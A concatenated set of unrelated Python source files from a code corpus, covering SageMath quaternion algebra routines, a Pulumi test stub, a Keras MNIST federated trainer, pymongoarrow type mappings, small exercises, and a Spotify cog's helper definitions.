using modules and intersection, but that would take over twice as long
because of overhead, hence this function.
EXAMPLES::
sage: a = matrix(QQ,4,[-2, 0, 0, 0, 0, -1, -1, 1, 2, -1/2, 0, 0, 1, 1, -1, 0])
sage: b = matrix(QQ,4,[0, -1/2, 0, -1/2, 2, 1/2, -1, -1/2, 1, 2, 1, -2, 0, -1/2, -2, 0])
sage: c = matrix(QQ,4,[0, 1, 0, -1/2, 0, 0, 2, 2, 0, -1/2, 1/2, -1, 1, -1, -1/2, 0])
sage: v = [a,b,c]
sage: from sage.algebras.quatalg.quaternion_algebra import intersection_of_row_modules_over_ZZ
sage: M = intersection_of_row_modules_over_ZZ(v); M
[ 2 0 -1 -1]
[ -4 1 1 -3]
[ 3 -19/2 1 4]
[ 2 -3 -8 4]
sage: M2 = a.row_module(ZZ).intersection(b.row_module(ZZ)).intersection(c.row_module(ZZ))
sage: M.row_module(ZZ) == M2
True
"""
if len(v) <= 0:
raise ValueError("v must have positive length")
if len(v) == 1:
return v[0]
elif len(v) == 2:
# real work - the base case
a, b = v
s,_ = a.stack(b)._clear_denom()
s = s.transpose()
K = s.right_kernel_matrix(algorithm='pari', basis='computed')
n = a.nrows()
return K.matrix_from_columns(range(n)) * a
else:
# induct
w = intersection_of_row_modules_over_ZZ(v[:2])
return intersection_of_row_modules_over_ZZ([w] + v[2:])
def normalize_basis_at_p(e, p, B = lambda x,y: (x*y.conjugate()).reduced_trace()):
r"""
Computes a (at ``p``) normalized basis from the given basis ``e``
of a `\ZZ`-module.
The returned basis is (at ``p``) a `\ZZ_p` basis for the same
module, and has the property that with respect to it the quadratic
form induced by the bilinear form B is represented as a orthogonal
sum of atomic forms multiplied by p-powers.
If `p \neq 2` this means that the form is diagonal with respect to
this basis.
If `p = 2` there may be additional 2-dimensional subspaces on which
the form is represented as `2^e (ax^2 + bxy + cy^2)` with
`0 = v_2(b) = v_2(a) \leq v_2(c)`.
INPUT:
- ``e`` -- list; basis of a `\ZZ` module.
WARNING: will be modified!
- ``p`` -- prime at which the basis should be normalized
- ``B`` -- (default:
``lambda x,y: (x*y.conjugate()).reduced_trace()``)
a bilinear form with respect to which to normalize
OUTPUT:
- A list containing two-element tuples: The first element of
each tuple is a basis element, the second the valuation of
the orthogonal summand to which it belongs. The list is sorted
by ascending valuation.
EXAMPLES::
sage: from sage.algebras.quatalg.quaternion_algebra import normalize_basis_at_p
sage: A.<i,j,k> = QuaternionAlgebra(-1, -1)
sage: e = [A(1), i, j, k]
sage: normalize_basis_at_p(e, 2)
[(1, 0), (i, 0), (j, 0), (k, 0)]
sage: A.<i,j,k> = QuaternionAlgebra(210)
sage: e = [A(1), i, j, k]
sage: normalize_basis_at_p(e, 2)
[(1, 0), (i, 1), (j, 1), (k, 2)]
sage: A.<i,j,k> = QuaternionAlgebra(286)
sage: e = [A(1), k, 1/2*j + 1/2*k, 1/2 + 1/2*i + 1/2*k]
sage: normalize_basis_at_p(e, 5)
[(1, 0), (1/2*j + 1/2*k, 0), (-5/6*j + 1/6*k, 1), (1/2*i, 1)]
sage: A.<i,j,k> = QuaternionAlgebra(-1,-7)
sage: e = [A(1), k, j, 1/2 + 1/2*i + 1/2*j + 1/2*k]
sage: normalize_basis_at_p(e, 2)
[(1, 0), (1/2 + 1/2*i + 1/2*j + 1/2*k, 0), (-34/105*i - 463/735*j + 71/105*k, 1), (-34/105*i - 463/735*j + 71/105*k, 1)]
"""
N = len(e)
if N == 0:
return []
else:
min_m, min_n, min_v = 0, 0, infinity
# Find two basis vectors on which the bilinear form has minimal
# p-valuation. If there is more than one such pair, always
# prefer diagonal entries over any other and (secondary) take
# min_m and then min_n as small as possible
for m in range(N):
for n in range(m, N):
v = B(e[m], e[n]).valuation(p)
if v < min_v or (v == min_v and (min_m != min_n) and (m == n)):
min_m, min_n, min_v = m, n, v
if (min_m == min_n) or p != 2: # In this case we can diagonalize
if min_m == min_n: # Diagonal entry has minimal valuation
f0 = e[min_m]
else:
f0 = e[min_m] + e[min_n] # Only off-diagonal entries have min. val., but p!=2
# Swap with first vector
e[0], e[min_m] = e[min_m], e[0]
# Orthogonalize remaining vectors with respect to f
c = B(f0, f0)
for l in range(1, N):
e[l] = e[l] - B(e[l],f0)/c * f0
# Recursively normalize remaining vectors
f = normalize_basis_at_p(e[1:], p)
f.insert(0, (f0, min_v - valuation(p, 2)))
return f
else: # p = 2 and only off-diagonal entries have min. val., gives 2-dim. block
# first diagonal entry should have smaller valuation
if B(e[min_m],e[min_m]).valuation(p) > B(e[min_n],e[min_n]).valuation(p):
e[min_m], e[min_n] = e[min_n], e[min_m]
f0 = p**min_v / B(e[min_m],e[min_n]) * e[min_m]
f1 = e[min_n]
# Ensures that (B(f0,f0)/2).valuation(p) <= B(f0,f1).valuation(p)
if B(f0,f1).valuation(p) + 1 < B(f0,f0).valuation(p):
f0 = f0 + f1
f1 = f0
# Make remaining vectors orthogonal to span of f0, f1
e[min_m] = e[0]
e[min_n] = e[1]
B00 = B(f0,f0)
B11 = B(f1,f1)
B01 = B(f0,f1)
d = B00*B11 - B01**2
tu = [ (B01 * B(f1,e[l]) - B11 * B(f0,e[l]),
B01 * B(f0,e[l]) - B00 * B(f1,e[l])) for l in range(2,N) ]
e[2:N] = [ e[l] + tu[l-2][0]/d * f0 + tu[l-2][1]/d * f1 for l in range(2,N) ]
# Recursively normalize remaining vectors
f = normalize_basis_at_p(e[2:N], p)
return [(f0, min_v), (f1, min_v)] + f
def maxord_solve_aux_eq(a, b, p):
r"""
Given ``a`` and ``b`` and an even prime ideal ``p`` find
(y,z,w) with y a unit mod `p^{2e}` such that
.. MATH::
1 - ay^2 - bz^2 + abw^2 \equiv 0 \bmod p^{2e},
where `e` is the ramification index of `p`.
Currently only `p=2` is implemented by hardcoding solutions.
INPUT:
- ``a`` -- integer with `v_p(a) = 0`
- ``b`` -- integer with `v_p(b) \in \{0,1\}`
- ``p`` -- even prime ideal (actually only ``p=ZZ(2)`` is implemented)
OUTPUT:
- A tuple `(y, z, w)`
EXAMPLES::
sage: from sage.algebras.quatalg.quaternion_algebra import maxord_solve_aux_eq
sage: for a in [1,3]:
....: for b in [1,2,3]:
....: (y,z,w) = maxord_solve_aux_eq(a, b, 2)
....: assert mod(y, 4) == 1 or mod(y, 4) == 3
....: assert mod(1 - a*y^2 - b*z^2 + a*b*w^2, 4) == 0
"""
if p != ZZ(2):
raise NotImplementedError("Algorithm only implemented over ZZ at the moment")
v_a = a.valuation(p)
v_b = b.valuation(p)
if v_a != 0:
raise RuntimeError("a must have v_p(a)=0")
if v_b != 0 and v_b != 1:
raise RuntimeError("b must have v_p(b) in {0,1}")
R = ZZ.quo(ZZ(4))
lut = {
(R(1), R(1)) : (1,1,1),
(R(1), R(2)) : (1,0,0),
(R(1), R(3)) : (1,0,0),
(R(3), R(1)) : (1,1,1),
(R(3), R(2)) : (1,0,1),
(R(3), R(3)) : (1,1,1), }
return lut[ (R(a), R(b)) ]
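# Editor's note -- an illustrative check, not in the original source; the
# helper name is hypothetical. It mirrors the doctest above in plain Python:
# each table entry solves 1 - a*y^2 - b*z^2 + a*b*w^2 = 0 (mod 4) with y a
# unit modulo 4.
def _demo_maxord_solve_aux_eq():
    for a in [ZZ(1), ZZ(3)]:
        for b in [ZZ(1), ZZ(2), ZZ(3)]:
            y, z, w = maxord_solve_aux_eq(a, b, ZZ(2))
            assert y % 4 in (1, 3)                      # y is a unit mod 4
            assert (1 - a*y**2 - b*z**2 + a*b*w**2) % 4 == 0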
# [dataset metadata elided] next entry: kyxg/AutoTrash -- pkg/codegen/internal/test/testdata/simple-resource-schema/python/pulumi_example/arg_function.py (licenses: Apache-2.0, MIT)
# coding=utf-8
# *** WARNING: this file was generated by test. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from . import _utilities, _tables
from . import Resource
__all__ = [
    'ArgFunctionResult',
    'AwaitableArgFunctionResult',
    'arg_function',
]
@pulumi.output_type
class ArgFunctionResult:
    def __init__(__self__, result=None):
        if result and not isinstance(result, Resource):
            raise TypeError("Expected argument 'result' to be a Resource")
        pulumi.set(__self__, "result", result)
    @property
    @pulumi.getter
    def result(self) -> Optional['Resource']:
        return pulumi.get(self, "result")
class AwaitableArgFunctionResult(ArgFunctionResult):
    # pylint: disable=using-constant-test
    def __await__(self):
        if False:
            yield self
        return ArgFunctionResult(
            result=self.result)
def arg_function(arg1: Optional['Resource'] = None,
                 opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableArgFunctionResult:
    """
    Use this data source to access information about an existing resource.
    """
    __args__ = dict()
    __args__['arg1'] = arg1
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    __ret__ = pulumi.runtime.invoke('example::argFunction', __args__, opts=opts, typ=ArgFunctionResult).value
return AwaitableArgFunctionResult(
result=__ret__.result)
| 41.890909
| 114
| 0.700087
|
9d61fed3d0531c27cf0f31b98bcc3489382ed97a
| 4,783
|
py
|
Python
|
lib/python/flame/examples/dist_mnist/trainer/keras/main.py
|
GaoxiangLuo/flame
|
16bd1715a545421d45ea0fc32544e448389de49c
|
[
"Apache-2.0"
] | 6
|
2022-03-30T23:37:05.000Z
|
2022-03-31T17:29:14.000Z
|
lib/python/flame/examples/dist_mnist/trainer/keras/main.py
|
GaoxiangLuo/flame
|
16bd1715a545421d45ea0fc32544e448389de49c
|
[
"Apache-2.0"
] | 10
|
2022-03-31T00:03:58.000Z
|
2022-03-31T07:15:06.000Z
|
lib/python/flame/examples/dist_mnist/trainer/keras/main.py
|
GaoxiangLuo/flame
|
16bd1715a545421d45ea0fc32544e448389de49c
|
[
"Apache-2.0"
] | 2
|
2022-03-30T23:25:15.000Z
|
2022-03-30T23:55:47.000Z
|
# Copyright 2022 Cisco Systems, Inc. and its affiliates
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
"""MNIST distributed learning trainer for Keras."""
import logging
from random import randrange
from statistics import mean
import numpy as np
from flame.config import Config
from flame.mode.distributed.trainer import Trainer
from tensorflow import keras
from tensorflow.keras import layers
logger = logging.getLogger(__name__)
class KerasMnistTrainer(Trainer):
"""Keras Mnist Trainer."""
def __init__(self, config: Config) -> None:
"""Initialize a class instance."""
self.config = config
self.dataset_size = 0
self.num_classes = 10
self.input_shape = (28, 28, 1)
self.model = None
self._x_train = None
self._y_train = None
self._x_test = None
self._y_test = None
self.epochs = self.config.hyperparameters['epochs']
self.batch_size = 128
if 'batchSize' in self.config.hyperparameters:
self.batch_size = self.config.hyperparameters['batchSize']
def initialize(self) -> None:
"""Initialize role."""
model = keras.Sequential([
keras.Input(shape=self.input_shape),
layers.Conv2D(32, kernel_size=(3, 3), activation="relu"),
layers.MaxPooling2D(pool_size=(2, 2)),
layers.Conv2D(64, kernel_size=(3, 3), activation="relu"),
layers.MaxPooling2D(pool_size=(2, 2)),
layers.Flatten(),
layers.Dropout(0.5),
layers.Dense(self.num_classes, activation="softmax"),
])
model.compile(loss="categorical_crossentropy",
optimizer="adam",
metrics=["accuracy"])
self.model = model
def load_data(self) -> None:
"""Load data."""
# the data, split between train and test sets
(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()
split_n = 10
index = randrange(split_n)
# reduce train sample size to reduce the runtime
x_train = np.split(x_train, split_n)[index]
y_train = np.split(y_train, split_n)[index]
x_test = np.split(x_test, split_n)[index]
y_test = np.split(y_test, split_n)[index]
# Scale images to the [0, 1] range
x_train = x_train.astype("float32") / 255
x_test = x_test.astype("float32") / 255
# Make sure images have shape (28, 28, 1)
x_train = np.expand_dims(x_train, -1)
x_test = np.expand_dims(x_test, -1)
# convert class vectors to binary class matrices
y_train = keras.utils.to_categorical(y_train, self.num_classes)
y_test = keras.utils.to_categorical(y_test, self.num_classes)
self._x_train = x_train
self._y_train = y_train
self._x_test = x_test
self._y_test = y_test
def train(self) -> None:
"""Train a model."""
history = self.model.fit(self._x_train,
self._y_train,
batch_size=self.batch_size,
epochs=self.epochs,
validation_split=0.1)
# save dataset size so that the info can be shared with aggregator
self.dataset_size = len(self._x_train)
loss = mean(history.history['loss'])
accuracy = mean(history.history['accuracy'])
self.update_metrics({'loss': loss, 'accuracy': accuracy})
def evaluate(self) -> None:
"""Evaluate a model."""
score = self.model.evaluate(self._x_test, self._y_test, verbose=0)
logger.info(f"Test loss: {score[0]}")
logger.info(f"Test accuracy: {score[1]}")
# update metrics after each evaluation so that the metrics can be
# logged in a model registry.
self.update_metrics({'test-loss': score[0], 'test-accuracy': score[1]})
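# The random shard selection in load_data() above is the one non-obvious step:
# each distributed trainer independently draws one 1/10th shard of the data.
# A minimal standalone sketch of the same trick (hypothetical helper, stand-in
# array instead of real MNIST):
def _shard_demo():
    data = np.arange(60000)
    split_n = 10
    shard = np.split(data, split_n)[randrange(split_n)]
    assert shard.shape[0] == len(data) // split_n
    return shard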
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description='')
parser.add_argument('config', nargs='?', default="./config.json")
args = parser.parse_args()
config = Config(args.config)
t = KerasMnistTrainer(config)
t.compose()
t.run()
| 33.683099
| 79
| 0.626176
|
dd0963eeb87e8c5e86f342bf457d06969a61bfd6
| 3,025
|
py
|
Python
|
bindings/python/pymongoarrow/types.py
|
Claire-Eleutheriane/mongo-arrow
|
4a054523a36379356aa709257756434c196ee71e
|
[
"Apache-2.0"
] | null | null | null |
bindings/python/pymongoarrow/types.py
|
Claire-Eleutheriane/mongo-arrow
|
4a054523a36379356aa709257756434c196ee71e
|
[
"Apache-2.0"
] | null | null | null |
bindings/python/pymongoarrow/types.py
|
Claire-Eleutheriane/mongo-arrow
|
4a054523a36379356aa709257756434c196ee71e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import enum
from datetime import datetime
import pyarrow.types as _atypes
from bson import Int64, ObjectId
from pyarrow import DataType as _ArrowDataType
from pyarrow import PyExtensionType, binary, bool_, float64, int64, string, timestamp
class _BsonArrowTypes(enum.Enum):
datetime = 1
double = 2
int32 = 3
int64 = 4
objectid = 5
string = 6
bool = 7
# Custom Extension Types.
# See https://arrow.apache.org/docs/python/extending_types.html#defining-extension-types-user-defined-types
# for details.
class ObjectIdType(PyExtensionType):
_type_marker = _BsonArrowTypes.objectid
def __init__(self):
super().__init__(binary(12))
def __reduce__(self):
return ObjectIdType, ()
# Internal Type Handling.
def _is_objectid(obj):
type_marker = getattr(obj, "_type_marker", "")
return type_marker == ObjectIdType._type_marker
_TYPE_NORMALIZER_FACTORY = {
Int64: lambda _: int64(),
float: lambda _: float64(),
int: lambda _: int64(),
datetime: lambda _: timestamp("ms"), # TODO: add tzinfo support
ObjectId: lambda _: ObjectIdType(),
    str: lambda _: string(),
    bool: lambda _: bool_(),
}
_TYPE_CHECKER_TO_INTERNAL_TYPE = {
_atypes.is_int32: _BsonArrowTypes.int32,
_atypes.is_int64: _BsonArrowTypes.int64,
_atypes.is_float64: _BsonArrowTypes.double,
_atypes.is_timestamp: _BsonArrowTypes.datetime,
_is_objectid: _BsonArrowTypes.objectid,
_atypes.is_string: _BsonArrowTypes.string,
_atypes.is_boolean: _BsonArrowTypes.bool,
}
def _is_typeid_supported(typeid):
return typeid in _TYPE_NORMALIZER_FACTORY
def _normalize_typeid(typeid, field_name):
if isinstance(typeid, _ArrowDataType):
return typeid
elif _is_typeid_supported(typeid):
normalizer = _TYPE_NORMALIZER_FACTORY[typeid]
return normalizer(typeid)
else:
raise ValueError("Unsupported type identifier {} for field {}".format(typeid, field_name))
def _get_internal_typemap(typemap):
internal_typemap = {}
for fname, ftype in typemap.items():
for checker, internal_id in _TYPE_CHECKER_TO_INTERNAL_TYPE.items():
if checker(ftype):
internal_typemap[fname] = internal_id
if fname not in internal_typemap:
raise ValueError(
f'Unsupported data type in schema for field "{fname}" of type "{ftype}"'
)
return internal_typemap
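# A minimal hypothetical usage sketch of the helpers above: normalize a
# user-facing schema to pyarrow types, then map it to the internal type ids
# (field names are illustrative):
if __name__ == "__main__":
    schema = {"_id": ObjectId, "count": int, "when": datetime}
    arrow_types = {name: _normalize_typeid(t, name) for name, t in schema.items()}
    print(_get_internal_typemap(arrow_types))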
| 28.809524
| 107
| 0.716364
|
5b82bd09475ef682f15b7e0fb843a2b7c209228c
| 1,716
|
py
|
Python
|
ex/ex075.py
|
Ozcry/PythonExercicio
|
b4d4a4fbd6467d1ced0815677ecbd78c2613c4c9
|
[
"MIT"
] | null | null | null |
ex/ex075.py
|
Ozcry/PythonExercicio
|
b4d4a4fbd6467d1ced0815677ecbd78c2613c4c9
|
[
"MIT"
] | null | null | null |
ex/ex075.py
|
Ozcry/PythonExercicio
|
b4d4a4fbd6467d1ced0815677ecbd78c2613c4c9
|
[
"MIT"
] | null | null | null |
'''Write a program that reads four values from the keyboard and stores them in a tuple. At the end, show:
A) How many times the value 9 appeared
B) The position where the first value 3 was entered
C) Which of the numbers were even.'''
print('\033[1;33m-=\033[m' * 20)
quatro = (int(input('\033[34mDigite um número: \033[m')), int(input('\033[35mDigite outro número: \033[m')), int(input('\033[36mDigite mais um número:\033[m ')), int(input('\033[37mDigite o último número:\033[m ')))
print('\033[1;33m-=\033[m' * 20)
print(f'\033[31mO valor 9 apareceu {quatro.count(9)} vezes\033[m')
if 3 in quatro:
print(f'\033[33mO valor 3 apareceu na {quatro.index(3) + 1}ª posição\033[m')
else:
print('\033[34mO valor 3 não foi digitado\033[m')
print(f'\033[35mOs valores pares digitados foram\033[m ', end='')
for c in quatro:
if c % 2 == 0:
print(f'\033[35m{c}\033[m ', end='')
print('\n')
print('\033[1;33m-=\033[m' * 20)
print('\033[1;32mFIM\033[m')
### Alternative method
'''
n1 = int(input('Digite um número: '))
n2 = int(input('Digite outro número: '))
n3 = int(input('Digite mais um número: '))
n4 = int(input('Digite o último número: '))
quatro = (n1, n2, n3, n4)
cont = 0
posicao2 = 0
posicao3 = 0
print(f'Os valores pares digitados foram ', end='')
for c in quatro:
if c == 9:
cont += 1
if c == 3:
posicao = quatro.index(3) + 1
posicao2 = posicao
posicao3 += 1
if c % 2 == 0:
if c != quatro[-1]:
print(f'{c}, ', end='')
else:
print(c, end='')
print(f'\nO valor 9 apareceu {cont} vezes')
if posicao2 != 0:
print(f'O valor 3 apareceu na {posicao2}ª posição')
if posicao3 == 0:
print('O valor 3 não foi digitado')
'''
| 33.647059
| 215
| 0.614802
|
ad9951c9d8de31c3b65478a2027d0ab76eec366d
| 1,289
|
py
|
Python
|
susp/utils.py
|
gaisin/standupstoreparser
|
1b1cd6f1831f490e2cf2e43a43d7312d48fb6f7e
|
[
"WTFPL"
] | 1
|
2020-12-27T18:02:58.000Z
|
2020-12-27T18:02:58.000Z
|
susp/utils.py
|
gaisin/standupstoreparser
|
1b1cd6f1831f490e2cf2e43a43d7312d48fb6f7e
|
[
"WTFPL"
] | 4
|
2020-03-12T22:22:20.000Z
|
2020-04-02T21:18:28.000Z
|
susp/utils.py
|
gaisin/standupstoreparser
|
1b1cd6f1831f490e2cf2e43a43d7312d48fb6f7e
|
[
"WTFPL"
] | 3
|
2020-02-20T21:37:45.000Z
|
2020-12-27T18:03:00.000Z
|
import logging
import logging.handlers
import sys
from susp import settings
def make_logger():
'''
    Creates and sets the logger configuration.
Note: use LOG.error(message, exc_info=True) or
LOG.exception(message) to log traceback
'''
logger = logging.getLogger('susp')
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler('/var/log/susp.log')
sh = logging.StreamHandler(stream=sys.stdout)
# TODO: make mutable subject in SMTPHandler to know right away what kind of error came
mh = logging.handlers.SMTPHandler(
mailhost=(settings.SMTP_SERVER, settings.SMTP_PORT),
fromaddr=settings.EXCEPTIONS_EMAIL_FROM,
toaddrs=settings.EXCEPTIONS_EMAIL_TO,
        subject='Standupstore parser caught an exception',
credentials=(settings.EXCEPTIONS_EMAIL_FROM, settings.SMTP_PASSWORD),
secure=()
)
mh.setLevel(logging.ERROR)
formatter = logging.Formatter('%(asctime)s - %(pathname)s - %(levelname)s - %(message)s')
exception_formatter = logging.Formatter('%(asctime)s - %(pathname)s - %(message)s')
fh.setFormatter(formatter)
mh.setFormatter(exception_formatter)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(mh)
logger.addHandler(sh)
return logger
| 32.225
| 93
| 0.707525
|
6b253046b5107ac28b1aa83d9a988ce35cc28c8a
| 737
|
py
|
Python
|
setup.py
|
tdaylan/MCOV
|
2bb806ea084532a7aecc0465769baecb4148101d
|
[
"MIT"
] | 2
|
2020-02-07T16:26:08.000Z
|
2020-06-09T22:18:39.000Z
|
setup.py
|
tdaylan/MCOV
|
2bb806ea084532a7aecc0465769baecb4148101d
|
[
"MIT"
] | null | null | null |
setup.py
|
tdaylan/MCOV
|
2bb806ea084532a7aecc0465769baecb4148101d
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
setup(
name = 'mergen',
packages = find_packages(),
version = '1.0',
    description = 'Unsupervised learning using data in time-domain astronomy',
author = 'Tansu Daylan, Emma Chickles, and Lindsey Gordon',
author_email = 'tansu.daylan@gmail.com',
url = 'https://github.com/tdaylan/mergen',
download_url = 'https://github.com/tdaylan/mergen',
license='MIT',
classifiers=['Development Status :: 4 - Beta',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python'],
    #install_requires=['astropy>=3'],
include_package_data = True
)
| 35.095238
| 80
| 0.630936
|
52aa3215e716be56f5df1957cae9c35f7f657a60
| 1,398
|
py
|
Python
|
introdution-to-python/find_kind_of_flower.py
|
mendesbarreto/machine-learing-course
|
b8e2da89fe79be02bb7d49fd2ad4045eef72e204
|
[
"MIT"
] | 1
|
2019-04-07T17:12:56.000Z
|
2019-04-07T17:12:56.000Z
|
introdution-to-python/find_kind_of_flower.py
|
mendesbarreto/machine-learing-course
|
b8e2da89fe79be02bb7d49fd2ad4045eef72e204
|
[
"MIT"
] | null | null | null |
introdution-to-python/find_kind_of_flower.py
|
mendesbarreto/machine-learing-course
|
b8e2da89fe79be02bb7d49fd2ad4045eef72e204
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as pyplot
from sklearn import *
from numpy import *
from sklearn.model_selection import train_test_split
iris_dataset = datasets.load_iris()
iris_data: ndarray = iris_dataset.data
iris_target = iris_dataset.target
x = iris_data
y = iris_target
x_train, x_test, y_train, y_test = train_test_split(iris_data, iris_target, test_size=0.25, random_state=33)
print(x_train.shape)
print("=======================================")
print(x_test.shape)
print("=======================================")
print(y_train.shape)
print("=======================================")
print(y_test.shape)
weights = 'uniform'
k_neighbors = 15
classifier = neighbors.KNeighborsClassifier(k_neighbors, weights=weights)
classifier.fit(x_train, y_train)
z = classifier.predict(x_train)
print(z.shape)
accuracy = classifier.score(x_train, y_train)
print("Training accuracy: " + str(accuracy))
sample = [[5,5,4,2]]
prediction = classifier.predict(sample)
print(prediction.shape)
print(prediction)
print("end")
k_range = range(1,26)
scores = []
for k in k_range:
knn = neighbors.KNeighborsClassifier(n_neighbors=k)
knn.fit(x_train, y_train)
y_prediction = knn.predict(x_test)
scores.append(metrics.accuracy_score(y_test, y_prediction))
pyplot.plot(k_range, scores)
pyplot.xlabel('Value of K for KNN')
pyplot.ylabel('Testing Accuracy')
pyplot.show()
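# A small follow-up sketch: report the k with the best held-out accuracy
# (argmax comes from the wildcard numpy import above).
best_k = k_range[int(argmax(scores))]
print("Best k on the test split: " + str(best_k))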
| 25.888889
| 108
| 0.704578
|
ab6f4034c78aad42ad3e0bc8ad485a05fb8a69ad
| 2,244
|
py
|
Python
|
src/mongo/db/fts/unicode/gen_casefold_map.py
|
stevelyall/mongol-db
|
d8046147bfe806f7acc0ec4aa70c132507b761fb
|
[
"Apache-2.0"
] | 1
|
2018-03-16T09:49:05.000Z
|
2018-03-16T09:49:05.000Z
|
src/mongo/db/fts/unicode/gen_casefold_map.py
|
stevelyall/mongol-db
|
d8046147bfe806f7acc0ec4aa70c132507b761fb
|
[
"Apache-2.0"
] | null | null | null |
src/mongo/db/fts/unicode/gen_casefold_map.py
|
stevelyall/mongol-db
|
d8046147bfe806f7acc0ec4aa70c132507b761fb
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
from gen_helper import getCopyrightNotice, openNamespaces, closeNamespaces, \
include
def generate(unicode_casefold_file, target):
"""Generates a C++ source file that contains a Unicode case folding
function.
The case folding function contains a switch statement with cases for every
Unicode codepoint that has a case folding mapping.
"""
out = open(target, "w")
out.write(getCopyrightNotice())
out.write(include("mongol/db/fts/unicode/codepoints.h"))
out.write("\n")
out.write(openNamespaces())
case_mappings = {}
cf_file = open(unicode_casefold_file, 'r')
for line in cf_file:
# Filter out blank lines and lines that start with #
data = line[:line.find('#')]
if(data == ""):
continue
# Parse the data on the line
values = data.split("; ")
assert(len(values) == 4)
status = values[1]
if status == 'C' or status == 'S':
# We only include the "Common" and "Simple" mappings. "Full" case
# folding mappings expand certain letters to multiple codepoints,
# which we currently do not support.
original_codepoint = int(values[0], 16)
codepoint_mapping = int(values[2], 16)
case_mappings[original_codepoint] = codepoint_mapping
out.write("""char32_t codepointToLower(char32_t codepoint, CaseFoldMode \
mode) {
if (mode == CaseFoldMode::kTurkish) {
if (codepoint == 0x049) { // I -> ı
return 0x131;
} else if (codepoint == 0x130) { // İ -> i
return 0x069;
}
}
switch (codepoint) {\n""")
mappings_list = []
for mapping in case_mappings:
mappings_list.append((mapping, case_mappings[mapping]))
sorted_mappings = sorted(mappings_list, key=lambda mapping: mapping[0])
for mapping in sorted_mappings:
out.write("\
case " + str(hex(mapping[0])) + ": return " + \
str(hex(mapping[1])) +";\n")
out.write("\
default: return codepoint;\n }\n}")
out.write(closeNamespaces())
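# A standalone check of the parsing logic in generate() above; CaseFolding.txt
# entries look like "0041; C; 0061; # LATIN CAPITAL LETTER A" (sample line is
# illustrative):
def _parse_demo():
    line = "0041; C; 0061; # LATIN CAPITAL LETTER A\n"
    data = line[:line.find('#')]
    values = data.split("; ")
    assert len(values) == 4 and values[1] == 'C'
    assert int(values[0], 16) == 0x41 and int(values[2], 16) == 0x61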
if __name__ == "__main__":
generate(sys.argv[1], sys.argv[2])
| 29.142857
| 78
| 0.608289
|
62e3316d3820ae989939ea74fca87eed2a2591ad
| 318
|
py
|
Python
|
2020/02-a.py
|
asmundg/adventofcode
|
adc0c9c8ba1d0ef04b621f6f8a5237ee34b9a230
|
[
"MIT"
] | null | null | null |
2020/02-a.py
|
asmundg/adventofcode
|
adc0c9c8ba1d0ef04b621f6f8a5237ee34b9a230
|
[
"MIT"
] | null | null | null |
2020/02-a.py
|
asmundg/adventofcode
|
adc0c9c8ba1d0ef04b621f6f8a5237ee34b9a230
|
[
"MIT"
] | null | null | null |
import re
r = re.compile(r"(\d+)-(\d+) ([a-z]): (.*)")
def check(line):
min, max, char, pw = r.search(line).groups()
num = len([c for c in pw if c == char])
return num >= int(min) and num <= int(max)
with open("input/02.input") as f:
res = [check(line) for line in f.readlines()]
print(sum(res))
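# Quick sanity checks with the sample policies from the puzzle statement
# (illustrative; they run after the real input is processed):
assert check("1-3 a: abcde")
assert not check("1-3 b: cdefg")
assert check("2-9 c: ccccccccc")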
| 24.461538
| 49
| 0.556604
|
95da3dc59b87dcee4b580632f05ea1aceae83d6c
| 10,414
|
py
|
Python
|
spotify/helpers.py
|
Flame442/Trusty-cogs
|
d7611f6d6739e0f344d04936f7af9cfea3fa426f
|
[
"MIT"
] | 148
|
2017-04-23T19:57:50.000Z
|
2022-03-12T06:59:58.000Z
|
spotify/helpers.py
|
mina9999/Trusty-cogs
|
a47de7c233f3c1802effd29f4a86f8a9b0e2b34a
|
[
"MIT"
] | 155
|
2018-01-01T13:27:45.000Z
|
2022-03-12T05:17:51.000Z
|
spotify/helpers.py
|
mina9999/Trusty-cogs
|
a47de7c233f3c1802effd29f4a86f8a9b0e2b34a
|
[
"MIT"
] | 221
|
2017-04-02T00:26:08.000Z
|
2022-03-26T15:06:54.000Z
|
import datetime
import logging
import re
from typing import Final, List, Pattern, Union
import tekore
from discord.ext.commands.converter import Converter
from discord.ext.commands.errors import BadArgument
from redbot.core import commands
from redbot.core.i18n import Translator
from redbot.core.utils.chat_formatting import humanize_timedelta
from tabulate import tabulate
log = logging.getLogger("red.trusty-cogs.spotify")
SPOTIFY_RE = re.compile(
r"(https?:\/\/open\.spotify\.com\/|spotify:?)(track|playlist|album|artist|episode|show)\/?:?([^?\(\)\s]+)"
)
SPOTIFY_LOGO = "https://imgur.com/Ig4VuuJ.png"
_RE_TIME_CONVERTER: Final[Pattern] = re.compile(r"(?:(\d+):)?([0-5]?[0-9]):([0-5][0-9])")
_ = Translator("Spotify", __file__)
REPEAT_STATES = {
"context": "\N{CLOCKWISE RIGHTWARDS AND LEFTWARDS OPEN CIRCLE ARROWS}",
